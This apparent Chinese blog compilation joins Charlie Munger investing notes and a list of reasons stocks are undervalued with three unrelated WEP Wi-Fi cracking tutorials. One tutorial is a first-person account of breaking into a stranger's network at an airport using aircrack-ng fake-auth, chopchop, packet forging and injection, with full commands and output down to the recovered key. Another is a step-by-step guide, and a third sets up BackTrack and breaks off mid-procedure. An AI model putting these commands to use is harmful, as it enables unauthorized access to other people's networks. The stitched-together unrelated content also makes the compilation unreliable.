12、金点子非常少——如果赔率对你非常有利,就下重注
13、避免不必要的交易税和摩擦成本,永远不要根据自己的兴趣采取行动
14、享受投资的过程吧,因为你就生活在这个过程中
15、机会是留给有准备的人,这就是股票的游戏规则
16、认识并适应你周围世界的真实本质,不要寄希望于世界会适应你
17、认清现实,即使你不喜欢现实——尤其是你不喜欢它的时候
18、避免狂妄自大和厌倦效应
芒格认为,有些人的个性天生就不适合投资,他们要么过于焦躁,要么缺乏耐心。只有当你具有较好的个性(主要是指你非常有耐心),拥有了足够的知识后,势必进行大规模进攻,然后就会慢慢学会游戏规则,部分通过实践,部分通过学习别人的经验。显而易见,你能从别人那儿获得的启发越多,你的情况就会越好。
六、查理芒格论投资
1、性格、耐心和求知欲
应当说一下,为避免在焦躁中拥有股票而需要磨练性情,但是单独依靠个性是无法取得投资成功的,你需要在很长的时间内拥有非常强烈的求知欲。长此以往,这种性情能逐步提高你关注现实的能力,如果你不具备这样的性格,注定会失败,即便你拥有很高的智商。
2、多样化投资
过度多样化投资的想法真的很疯狂。我从不相信四处出击的多元化投资能带来优秀的回报。回头看我们做出的前15大决策,你会发现我们获得了平均的回报,不需要太多活动,只要有耐心就可以了,你应该严守自己的规则,在机会来临的时候全力出击,过去伯克夏尔就是通过押注那些肯定要发生的事情而赚钱的(注意芒格的措辞很多和赌博有关)
3、价值投资和长期投资
当你因为某项东西的价值低估而买入,在价格接近你认为的内在价值时抛出,这太难了!
4、伯克夏尔的投资失误
错误有两种:第一种是什么都不做,沃伦称为"舔大拇指",第二种是没有足额购买应该大量购买的东西。伯克夏尔因为错失的机会成本高达几十亿美元,例如我们因为股价大涨错失了沃尔玛,一个价值上百亿美元的失误。
5、能力范围及其界限
你所要做的,就是找到自己的能力范围,然后专注于这些领域。如果你拥有了能力,就应该知道自己的界限,如果你不知道自己的能力界限,那你就根本没有拥有能力。
但投资的游戏规则,就是不断学习,例如沃伦(巴菲特)学了很多,扩大了他的能力范围,所以才能够对诸如中国石油等公司进行投资。
七、次贷危机前查理.芒格对金融机构和金融衍生品的警告
我们对那些使用财务杠杆的金融公司尤其担心(银行也属于使用财务杠杆较大的金融公司),如果他们开始讨论自己在控制风险上做得如何出色,这会让我们感到紧张。我们比其他人更早感到焦躁不安,每当出现这样的焦躁情绪,我们就会把钱放在桌子上(芒格意为清仓),你只能适应这种做法。
衍生品是个非常不负责任的系统,这个系统过于复杂,你无法相信数万亿美元参与其中,你无法相信它有多复杂,你也无法相信有多么大的动机会让人对价值和清算能力产生一厢情愿的想法。
一开始人们只是试图对冲利率带来的风险(本身这就是非常复杂困难的),之后对冲操作让(公布的盈利)出现了波动,他们又发明新的工具来消除这些波动,此时你已经陷入了谎言之中,很多大企业都出现这样的情况。
衍生品有很多条款,例如一方的信用被调低,信用被调低的一方必须提供更多的抵押品,你可能因此破产(如果使用了足够的财务杠杆),但当公司伸手去拿(对方的抵押品)的时候,钱并不在那里,为了保护自己,他们引入了不稳定因素,似乎没有人意识到他们发明的系统会带来灾难,这是一个疯狂的系统!
芒格说:我极其憎恨GAAP(公认会计准则)应用于衍生品和掉期和约中,摩根大通利用了这个会计准则,我认为它应该为此感到丢人。这些模型创造了奇怪的衍生品,结果这些会计盈利都不是真实的盈利,当你希望拿到真金白银的时候,它就消失了,这些钱根本就没有存在过。
对衍生品的说明真是一桩让人作呕的差事,它就像一条下水道,如果我是正确的,届时将会有严厉的惩罚在等待它,你所要做的,就是准备当这些衍生品崩溃时该怎么办?
我们试图卖掉GEN
RE(通用再保险)公司的衍生品业务,但没有成功。我可以信心十足的预测,大型银行无法按照账面价值清算这个国家的多数衍生品。我不知道这些衍生品何时走向灭亡以及情况会变得多糟糕,但我担心最终的结局会非常可怕。
如果未来5-10年内没有出现与衍生品有关的崩盘,我将会感到不可思议。我认为我们是美国唯一一家可以逃脱衍生品影响的大公司,对于伯克夏尔而言,从事这样的业务是一种疯狂的想法,对大银行而言,这是一项疯狂的业务。
其实在塞斯.卡拉曼的《安全边际》中,也曾对美国金融衍生品提出过严重的批评和质疑,对于严肃的价值投资者而言,似乎总是能从这些谎言的(趋势)中识别,并且脱身而出。
从这些文章可以看出,查理.芒格有过人的眼光和一针见血的洞察力,这些可能就是他独有的天赋吧。
八、规模效应、特许经营权、行业竞争格局
查理.芒格在1994年南加州大学商学院的一次讲演中,阐述了对规模效应、特许经营权等一系列问题。
芒格用几何学来阐述规模效应:如果你铸造一个铁圆形池,随着体积增大,单位面积的铁就能构成更大体积。这就是所谓的"规模效应"。芒格举例电视广告,他说:在早期,仅有三个有线电视网覆盖了90%的人群,电视广告风靡。如果你是宝洁公司,尽管广告费用巨大,但它财大气粗,通过一个广告就能甩掉大量的瓶瓶罐罐。而那些小公司,却因为产品销量少而无法轻易使用广告。直到后来广告的普及,才使这些小公司也有机会出头。
芒格认为,规模优势还与信息竞争优势相伴而行。例如在一个偏远的地方,看到箭牌口香糖和格洛茨口香糖放在一起,一个标价40美分,一个30美分,你会为了10美分把从没听说过的品牌塞进嘴巴吗?箭牌受惠于其知名度,就具备了规模优势,也就是信息竞争优势。
芒格指出,规模效应在心理学上还有个渊源,就是"社交证明"(social
proof),因为人总是有意无意受到其他人喜好和行为的影响。如果人们都簇拥去买同一个东西,我们就通常会认为它质量更好,于是也亦步亦趋。
又例如报业,除了一些超级大城市,美国每个城市都只剩下一家日报。当这家日报拥有很大的发行量,也就意味着有很大量的广告。一旦两者结合起来,哪个读者还愿意看那些薄薄的,信息量少的报纸?所以,这就是阶梯式的"赢者通吃",也是规模效应的一种。
在中国,也有很多这样的例子:例如腾迅,当一个及时通讯工具拥有了几亿个客户,就形成了网络累积效应:正是更多的客户吸引了新的的客户加入。而后进者,则非常难撼动先发者的优势地位。又如中国移动,累计了4亿多移动客户后,真正优质的客户,并不太愿意随时改变自己的服务商和号码,而通过这些客户,又能不断吸引新的客户。又如阿里巴巴和淘宝网,当你在这个网上能找到足够多的信息,那客户为什么还要花费力气去其他网络呢。
芒格同时指出,规模效应可能造就行业占据绝对优势的少数大公司,但并非无懈可击。他说:并不总是越大越好,大规模的弊病就是官僚主义。在这样的情况下,内部的激励机制会失效。例如早期的AT&T(美国电话电报公司),在那样的垄断大公司下工作,谁还会在乎股东的利益?你的工作从你的文件篮(IN-BASKET)转到别人的文件篮中,你就以为已经解决问题了。所以它逐步演变成臃肿、麻木的官僚机构。
所以生活就是两种力量的无止境对抗——一方面取得规模效应的优势,一方面就是踩着美国农业部的脚后跟行事(芒格认为美国农业部没干几件有用的事,却忙得不亦乐乎)。
和规模效应相对的,是"专业化"。例如大而全的《星期六晚邮报》曾经显赫一时,但现在已经不在了。芒格幽默的说:我们手边都是《越野摩托》这样的杂志,他们的读者都是喜欢在比赛时开着摩托车翻跟头的傻瓜,但他们非常热衷于此。这本杂志的利润率说出来会令你垂涎三尺。
芒格在分析规模效应时,特别提到连锁店。他说:说到规模效应,连锁店值得一提。连锁店具有巨大的规模效应。例如沃尔玛,在面对零售巨人西尔斯.罗巴克(西斯连锁百货公司)时,他们在城市的郊区一步步打败小的供应商,直到最后开始进军城市区,去毁灭"大人物"。占尽优势的西尔斯百货公司却在长期的优势下逐步陷入官僚化,在这样的体系下,如果你有新点子,保不准会成为这个系统的敌人(既得利益者阻碍了创新和变革)。
芒格又提到了行业的竞争格局。他指出,尽管最终不少市场沦为少数公司的天下,但不同行业的竞争结果却是截然不同的:例如航空业,几乎没有公司能最终从这个市场上赚到钱。而例如麦片公司,几乎所有的制造公司都能赚到可观的利润。又如碳酸饮料的两个巨头:可口可乐和百事可乐,非常稳定的赚取利润。
芒格说的,即寡头垄断竞争格局下的"囚徒困境":少数(特别是行业只剩下两个巨头)寡头竞争时,似乎表面竞争激烈,实际上都在试图维持一个"平衡",主动进攻者可能会导致激烈的反击使得两败俱伤。
所以,我们对某些行业仅剩余两家寡头的垄断竞争行业,需要格外注意:这些公司的经营业绩可能会非常稳定。例如乳制品行业(现在由于行业激变,情况更复杂)、家电零售行业、原来的电信运营行业等等。
另外,芒格指出:很多人根本不能区分,哪些是可能害死你的科技,哪些会有益,而巴菲特这个家伙却非常明白。
芒格讲了一个精彩的小故事:有一天,有个人跑去跟巴菲特说:有人发明了一种新的织布机,效率可能是我们机器的两倍。巴菲特听了后跟芒格说:伙计,我希望这不是真的,否则我们就要关门大吉了。
芒格理解他的原意是:纺织业是个竞争过度的行业,改进机器会促使商品生产率大幅提升,但好处只会落在客户身上,而厂家捞不到一点好处。
而相反,芒格说:如果你在奥什科什拥有唯一一家报社,有人发明了更有效率的排版术,你使用这种技术,花费的成本都会从客户那儿系数返还。
芒格的意思很明确:只有对于具有垄断优势的企业,科技的提升才能将带来的成本降低效果留在公司。
九、有效市场理论、错位赌注、格雷厄姆等
芒格认为,有效市场理论大体上是正确的,对于一个聪明的,循规蹈矩的选股人来说,市场是非常有效的,要战胜市场相当困难。但别忘了这个世界的"铁律":只有20%的人才能跻身前15%(二八效应)。
芒格将股市,比作"赛马中的彩池投注系统":每个人都来下注,赔率根据赌资变化。尽管一个傻瓜也能看出一匹记录辉煌、步履轻快的赛马获胜概率高,但别忘了前者的赔率是3:2,而一匹记录糟糕的马赔率是100:1。股价也是如此,所以战胜系统非常艰难。
更糟糕的是,赛马场主要收取17%的赌资作为佣金,于是不幸的是,一个聪明的,研究颇深的赛马者,也仅能努力将亏损降为10%(因为有17%的佣金)。无论如何,很少人能在交纳17%佣金后还能持续赢得比赛的。
但芒格说到:我曾碰到过在这个游戏中能活得滋润的人。这些人将赛马作为自己的职业,但他们只是在看到一些实用的,价格偏离的赌注时,才偶尔下注。
尽管人类并不是生来就具备通晓才能的,但上天赐给那些孜孜不倦的人一项才能——他们在观察并寻找世界上错价的赌注,机会不太多,但偶尔会有一个。既然上天赐给良机,聪明的人就会重金下注,但其他时候,却始终按兵不动。
芒格认为在投资领域,和赛马赌博投注上,并没有太大区别。他说:对我来说,赢家必须有选择性的下注,这个道理显而易见,我很早就明白了这个道理,但我不明白,为什么对许多人来说却如此难以参透。
芒格批评了所谓的"板块轮转":一个让很多人着迷的技法就是"板块轮转",你在心中推测石油股价超越零售股的时间表,然后满场转悠,往市场最热门的板块中钻,以为长此以往,你就能作出比别人更高明的决策,跑在市场的前面。也许真有这样的人,但我认识的那些有钱人,没有一个人是靠这个发了财的。
芒格又批评了格雷厄姆,他说:格雷厄姆使用的方法,我和沃伦都喜欢,但格雷厄姆方法在那个年代(30年代)适用,现在而言,如果一家企业陷入危机,资产负债表上的东西也会随之消失。而且你无法完全撇开员工,将公司营运资本打包带走。而且,目前类似格雷厄姆标准的"廉价股"也都消失了。
但,芒格还是对格雷厄姆提出的"市场先生"系统赞不绝口,他说:将市场剥离出来,作为一个每天都可能给你机会的人,这一点对巴菲特建立自己的体系太重要了。
芒格指出,格雷厄姆很少谈及管理,他总是认为,管理中的信息常常被扭曲,容易误导大众。但芒格认为,正是能辨认出一些公司管理的优势和内在动能,才能使得自己对于一些高出账面价值2-3倍的公司做出更好的判断:它们仍可能是被低估的。
芒格又提到一个非常重要的观点:从长期来说,一只股票的回报率跟企业发展是环环相扣的,如果一家企业40年来的盈利一直是它资本的6%,那在长期持有40年后,你的年均收益率不会和6%有什么区别——即便你当初买的时候检的便宜货。如果该企业在20-30年间盈利都是资本的18%(芒格指的ROE),即便你当初出价过高,回报依然会令你满意!芒格这个判断得到过西格尔教授的数据支持,即便在1973年泡沫最高峰买入漂亮50股票的人,在20年后依然能超越市场,取得不错的回报。但,这并不成为"任何价位下都可以买入伟大公司"的理由。
芒格在文中,对"成长股"的进入时机,进行了阐述:一种方法是在他们成长的时候就慧眼识珠,瞄准进入,例如在山姆沃尔顿将沃尔玛上市的时候。如果你很年轻,这样做乐趣多多。但对于伯克夏尔这样的巨型公司,这个方法并不奏效。但芒格认为,在他们成长的时候就慧眼识珠,是一种明智的方式,只是他自己没有这么做而已。(这和巴菲特的原意不符,巴菲特曾对投资IPO的公司说了很多否定的看法,但芒格提倡可以尝试)
芒格在后文中提到一家公司:国际香精香料公司,认为这个公司是他所知道的唯一一家对自己的产品设置版权或专利权的公司(原文如此,应该远不止),他们为其他公司设计专利产品的香味——例如刮胡泡沫的香料。而这样的淡雅的香味,对促进消费具有重要意义。这让我马上想到了香港上市的华宝国际,非常值得研究。

使用Ubuntu进行无线破解过程

前几天在接女朋友,在机场接女朋友,因为有二个小时,自己坐在机场蛮无聊的,就想拿电脑上网,但发现,基本都是加密的,没有可以用的.所以没法子,只有强行来硬的啦.整个过程一共花了20分钟
我的环境是Ubuntu9.04.用的笔记本是IBM X200 无线网卡是Intel(R) WiFi Link
5100 AGN.在linux下面做这些真是太方便了.以下为整个无线破解的过程.
开启wlan为监听模式
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon
Interface Chipset Driver
mon0 Unknown iwlagn – [phy0]
(monitor mode enabled on mon0
开始抓包(这个终端不要关掉)
fukai@fukai-laptop:~$sudo airodump-ng -w chop.cap –ivs –channel 11 mon0
CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER
AUTH E
00:02:2D:B4:31:01 -55 0 10 0 0 1 11
OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11
OPN C
00:02:2D:B4:30:F6 -72 96 10393 206 0 11 11
OPN C
00:0F:B5:79:DD:DD -76 93 8306 24444 0 11 54 . WEP WEP
OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11
OPN C
00:02:2D:B4:5D:78 -74 0 5 0 0 1 11
OPN C
00:02:2D:B4:31:5A -76 0 6 0 0 1 11
OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP
PSK S
00:02:2D:B4:5D:64 -80 0 8 0 0 1 11
OPN C
BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:DD:DD 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
^C
进行FakeAuth攻击(我原来的x60到这步就死机)
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:DD:DD -h
00:21:5d:90:e9:0a mon0
注:-h为主机MAC地址 -a为需要破解的无线AP的地址
21:59:31 Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
21:59:31 Sending Authentication Request (Open System) [ACK]
21:59:31 Authentication successful
21:59:31 Sending Association Request [ACK]
21:59:31 Association successful (AID: 1)
进行Chopchop攻击
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:DD:DD -h
00:21:5d:90:e9:0a mon0
22:00:05 Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
Read 2507 packets…
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:0F:B5:79:DD:DD
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:79:DD:DD
0×0000: 0842 0000 ffff ffff ffff 000f b579 0498 .B………..y..
0×0010: 000f b579 0498 005a 6772 0400 6e0c 067f …y…Zgr..n..
0×0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab |…..1.&…^P..
0×0030: 3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83 :..V….ob}..N..
0×0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc ..^.p?…….!..
0×0050: 8767 f385 61cc .g..a.
Use this packet ? y
Saving chosen packet in replay_src-0413-220115.cap
Offset 85 ( 0% done) | xor = F9 | pt = 35 | 92 frames written in
1569ms
Offset 84 ( 1% done) | xor = 82 | pt = E3 | 33 frames written in
561ms
Offset 83 ( 3% done) | xor = 63 | pt = E6 | 141 frames written in
2404ms
Offset 82 ( 5% done) | xor = 77 | pt = 84 | 198 frames written in
3373ms
Offset 81 ( 7% done) | xor = 67 | pt = 00 | 69 frames written in
1166ms
Offset 80 ( 9% done) | xor = 87 | pt = 00 | 3 frames written in
50ms
Offset 79 (11% done) | xor = BC | pt = 00 | 461 frames written in
7840ms
Offset 78 (13% done) | xor = A2 | pt = 00 | 452 frames written in
7665ms
Offset 77 (15% done) | xor = 21 | pt = 00 | 156 frames written in
2660ms
Offset 76 (17% done) | xor = 8D | pt = 00 | 256 frames written in
4360ms
Offset 75 (19% done) | xor = 8C | pt = 00 | 31 frames written in
519ms
Offset 74 (21% done) | xor = BD | pt = 00 | 12 frames written in
211ms
Offset 73 (23% done) | xor = 8D | pt = 00 | 681 frames written in
11572ms
Offset 72 (25% done) | xor = 82 | pt = 00 | 231 frames written in
3936ms
Offset 71 (26% done) | xor = 14 | pt = 00 | 126 frames written in
2148ms
Offset 70 (28% done) | xor = F4 | pt = 00 | 359 frames written in
6085ms
Offset 69 (30% done) | xor = 3F | pt = 00 | 143 frames written in
2443ms
Offset 68 (32% done) | xor = 70 | pt = 00 | 253 frames written in
4307ms
Offset 67 (34% done) | xor = 17 | pt = 00 | 70 frames written in
1182ms
Offset 66 (36% done) | xor = 5E | pt = 00 | 100 frames written in
1691ms
Offset 65 (38% done) | xor = A4 | pt = 00 | 164 frames written in
2779ms
Offset 64 (40% done) | xor = FC | pt = 00 | 1101 frames written in
18689ms
Offset 63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in
17906ms
Offset 62 (44% done) | xor = 9D | pt = 00 | 226 frames written in
3819ms
Offset 61 (46% done) | xor = E6 | pt = A8 | 181 frames written in
3076ms
Offset 60 (48% done) | xor = 09 | pt = C0 | 16 frames written in
271ms
Offset 59 (50% done) | xor = 0B | pt = 00 | 55 frames written in
939ms
Offset 58 (51% done) | xor = 7D | pt = 00 | 71 frames written in
1197ms
Offset 57 (53% done) | xor = 62 | pt = 00 | 228 frames written in
3860ms
Offset 56 (55% done) | xor = 6F | pt = 00 | 331 frames written in
5626ms
Offset 55 (57% done) | xor = F0 | pt = 00 | 198 frames written in
3354ms
Offset 54 (59% done) | xor = 14 | pt = 00 | 64 frames written in
1089ms
Offset 53 (61% done) | xor = A3 | pt = 01 | 246 frames written in
4174ms
Offset 52 (63% done) | xor = FC | pt = 00 | 754 frames written in
12819ms
Offset 51 (65% done) | xor = FE | pt = A8 | 102 frames written in
1721ms
Offset 50 (67% done) | xor = DB | pt = C0 | 42 frames written in
721ms
Offset 49 (69% done) | xor = 87 | pt = 98 | 97 frames written in
1645ms
Offset 48 (71% done) | xor = 3E | pt = 04 | 47 frames written in
797ms
Offset 47 (73% done) | xor = D2 | pt = 79 | 63 frames written in
1064ms
Offset 46 (75% done) | xor = 51 | pt = B5 | 252 frames written in
4252ms
Offset 45 (76% done) | xor = 5F | pt = 0F | 108 frames written in
1828ms
Offset 44 (78% done) | xor = 5E | pt = 00 | 241 frames written in
4074ms
Offset 43 (80% done) | xor = F2 | pt = 01 | 193 frames written in
3257ms
Offset 42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in
19048ms
Offset 41 (84% done) | xor = 18 | pt = 04 | 420 frames written in
7191ms
Offset 40 (86% done) | xor = 20 | pt = 06 | 586 frames written in
9941ms
Offset 39 (88% done) | xor = F1 | pt = 00 | 394 frames written in
6683ms
Offset 38 (90% done) | xor = 39 | pt = 08 | 228 frames written in
3868ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in
17194ms
Offset 36 (94% done) | xor = FF | pt = 00 | 282 frames written in
4801ms
Offset 35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in
31105ms
Sent 2386 packets, current guess: 48…
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor
Completed in 303s (0.16 bytes/s)
使用tcpdump查看生成的CAP文件内容
fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0F:B5:79:DD:DD
SA:00:0F:B5:79:DD:DD LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa)
Command, ctrl 0×03: oui Ethernet (0×000000), ethertype ARP (0×0806): arp
who-has 192.168.0.101 tell 192.168.0.1
构造注入包
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h
00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y
replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap
同时进行Interactive Attack攻击
fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0F:B5:79:DD:DD -h
00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y
replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:0F:B5:79:DD:DD
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:5D:90:E9:0A
0×0000: 0841 0201 000f b579 0498 0021 5d90 e90a .A…..y…!]…
0×0010: ffff ffff ffff 8001 6772 0400 6e0c 067f ……..gr..n..
0×0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 |…..1.&…^~.B
0×0030: d78d 2401 035c 14f0 6f62 7d0b f619 6219 ..$..\..ob}…b.
0×0040: e060 df45 .`.E
Use this packet ? y
Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.
End of file.
破解
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs
Aircrack-ng 1.0 rc3
[00:00:02] Tested 296 keys (got 15985 IVs)
KB depth byte(vote)
0 5/ 6 01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
1 3/ 5 0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
2 0/ 2 45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
3 0/ 1 67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
4 4/ 5 89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)
KEY FOUND! [ 01:23:45:67:89 ]
Decrypted correctly: 100%

一只股票被低估的十个原因

如果你发现了一只你认为是被低估的股票,弄清楚它被低估的原因是很重要的。有趣的是,一些象绿光资本的David
Einhorn这样的价值投资者却翻转了这个程序,他们不是根据象市盈率、市净率这样的定量筛选来发掘股票,而是首先确定可能存在低估的市场范围,然后在这个低估的板块中寻找好股票。
当我的2007年7月参加哥伦比亚大学价值投资教育课程的时候,Bruce
Greenwald教授强调了一个反问的重要性,就是当你发现一个低估的股票时,考虑一下为什么市场会让你以这么好的价格买到?如果你不能回答这个问题,卖方可能知道一些你不知道的事情或者人家比你聪明。举个例子,报纸业的股票的价格非常这低,但巴菲特与Rupert
Murdoch为什么没有买入。当两个世界上最智慧的、知识最渊博的媒体投资人对此视而不见,你还会认为它有巨大价值?这不光需要逆向思维还需要投资者独立进行思考。这只是投资评价和识别过程另一面的事实,其它人可能比你拥有更多或更好的信息。下面是股票被低估的十个原因:
1.
整个市场低迷。这通常是股票被低估的最明显的原因,发生在宏观经济预测不好的时期。这就需要投资者具备几个基本的工具来评价(而不是预测)总体的市场情况,为市场的低估作好准备。
2.
某些行业总的状况不良。经典的例子就是发生在90年代的Hillarycare(希拉里医改)造成的医疗保健板块股票的下跌。
3.
某些地区的宏观状况欠佳。在1990-1991年的衰退期,加利福尼来的经济受房地产市场的影响而极其萧条。巴菲特利用了这次极佳的机会买入了富国银行。
4.
严重的短期问题但不影响长期的生意。经典案例是巴菲特在1963年美国运通发生财政丑闻时买入,还有在70年代末Geico由于保险事故而定价极低时的介入。在这两个例子中,问题都可以被解决,更重要的是,这些问题没有伤害到美国运通品牌的竞争优势和Geico的低成本结构。
5.
公司由核心高回报业务转为多元化。80年代,可口可乐开展多元化的、无核心的、低回报的业务,如养虾、拍电影等,这掩盖了它饮料这个核心业务的大金矿。1988年,巴菲特以15倍的市盈率开始收集,基于传统的估值方法,可口可乐的股票价格并非极度便宜。但是,不明智的多元化使市场没有发现这是一棵长期的摇钱树。
6. 公司不付红利或者减少红利。巴菲特曾提到,这就是他1958年购买Commonwealth
Trust Co.的理由。
7. 没有人关注的公司。如果一家小公司没有分析师关注就可能被低估。
8.
刚经过拆分的公司。这也是一个经典的机会区域。这个新公司可能具有极佳的经济前景,但因为从前作为母公司的一部分而不为人知。Joel
Greenblatt的书《你可以成为股市天才》对拆分获利有深刻的论述。
9.
公司因破产而产生。市场没有认识到新组建公司的价值,其已免于债务负担和其它遗留问题。
10. 公司业务过于复杂。这是著名的价值投资者Seth
Klarman最喜欢的区域。如果多数投资者不理解详细的情形或者不愿花功夫去做大量的工作,就为精明的投资者提供了用低价参与的机会。

Ubuntu8.10破解wep无线加密

测试环境:电脑dell 1400 无线网卡intel 3945abg 硬盘安装 Ubuntu8.10
linksys无线AP
一、安装ubuntu和aircrack-ng
先安装 Ubuntu8.10,更新系统到最新
终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装
二、破解过程
1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)
2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端
3、抓包
另开一个终端,输入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's
MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)
4、与AP建立虚拟连接
再另开一个终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址)
5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC
mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!
6、解密
收集有5000个以上的DATA之后,另开一个终端,输入:
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng
会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)
7、收工
破解出密码后在终端中输入 sudo airmon-ng stop mon0
关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
现在可以冲浪去了,或者重复步聚1-7破解其它的AP
呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。

无线网络密码破解

本教程,目的是让大家可以了解破解无线网络的方式,从而加强自己的网络安全性。请不要用于非法目的。
另外,在互联网上,有太多的方法知道你是谁,不要以为用别人的AP就没人找得到你哦。
这里是一个较为详细的BT3 Backtrack 3 破解无线网WEP的一个教程。
首先
http://wiki.remote-exploit.org/index.php/HCL:Laptops
到这个地方确认你的笔记本电脑可以做这个事情。
基本新一点的都是兼容的。
其次,到这里确认你的无线网卡兼容
http://wiki.remote-exploit.org/index.php/HCL:Wireless
然后开始下载你需要的BT3版本:
http://wiki.remote-exploit.org/index.php/Main_Page
个人建议:
如果随便玩玩,或者是台式机,可以下载CD版的那个,因为启动一次时间不短。
如果是笔记本,硬盘又大,可以下载 USB版的那个。
USB版:
http://www.remote-exploit.org/bt3b141207.rar.torrent
http://backtrack.mjdupree.com/bt3b141207.rar
ftp://bt3.aircrack-ng.org/bt3b141207.rar
下载完以后,可以装到一个可以启动的U盘里面,或者直接扔到硬盘上,后面我会说如何用硬盘直接启动这个东西。
-----------------如何变成启动盘--------------------
光盘版的,刻录完就好了,不提了。
USB版的, 随便解压缩到某个U盘的根目录,这样,根目录下有
BT3和Boot两个文件夹。
打开一个DOS窗口, 指向你的U盘目录,比如是H盘,那么
———运行———
H: +回车
cd boot
bootinst.bat
按提示,确认你的确是在你的U盘的目录下操作。然后OK了。
重启时插入U盘即可启动,如果有任何问题,请确认你的电脑打开了U盘启动,并且被放在第一启动项(ThinkPad可以指定排除某个启动项的,请检查)
或者在启动时按住F12, 选择 U盘启动。
如果是硬盘启动,虽然有很多办法,但是为了VISTA和XP的兼容,个人推荐
DOS启动法,即先弄一个DOS的启动,比如弄一个MouseDOS一类的,傻瓜安装,可以让电脑启动进入纯DOS状态,然后在DOS情况下,进入
硬盘上解压出的那个Boot目录里面,里面有个DOS 目录,然后执行BT3.bat 即可。
建议在执行BT3.bat前,先运行一下 Smartdrv.exe
,可以加快启动速度很多。(附件里有 Smartdrv.exe 98版)
小提示:DOS下的启动,不会自动进入图形界面,可以通过编辑 DOS目录里面的
CONFIG文件来实现:
只需要在CONFIG里面,最后加上一句:
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的 Autoexec.bat文件,直接加上:
smartdrv.exe
D:
cd boot
cd dos
bt3.bat
这样启动直接进入了图形界面。
这时候的BT3,是全部在内存里的,也就是说,在系统内,任何对桌面和配置的改动都不会被记录,所以如果要记录文档,请不要放在桌面上。
———————————破解—————————————
以下是破解过程
WEP 破解
1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
